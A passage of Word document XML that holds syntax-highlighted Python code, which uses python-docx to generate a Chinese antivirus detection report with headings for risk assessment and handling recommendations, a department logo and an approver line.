          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分析内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">).bold = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"AV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'List Bullet'</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>风险评估</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'List Bullet'</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>处置建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'List Bullet'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5</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document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_picture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'./logo/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网安系徽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.jpg'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Inches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_paragraph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>审批：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>赵晓娜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Footer'</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一级标题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>国际知名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>厂商检测报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_page_break</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7F8591"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">styles </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= document.styles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    document.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_heading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'AV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
